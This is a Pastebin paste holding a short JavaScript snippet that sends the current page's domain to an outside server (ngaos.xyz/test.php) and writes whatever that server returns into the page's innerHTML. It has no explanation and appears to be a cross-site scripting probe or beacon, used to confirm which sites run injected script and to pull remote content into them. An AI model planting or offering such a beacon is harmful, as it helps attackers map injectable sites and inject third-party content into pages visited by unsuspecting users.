Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var xhttp = new XMLHttpRequest();
- xhttp.onreadystatechange = function() {
- if (this.readyState == 4 && this.status == 200) {
- // Typical action to be performed when the document is ready:
- document.getElementById("demo").innerHTML = xhttp.responseText;
- }
- };
- xhttp.open("GET", "http://ngaos.xyz/test.php?data="+document.domain, true);
- xhttp.send();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement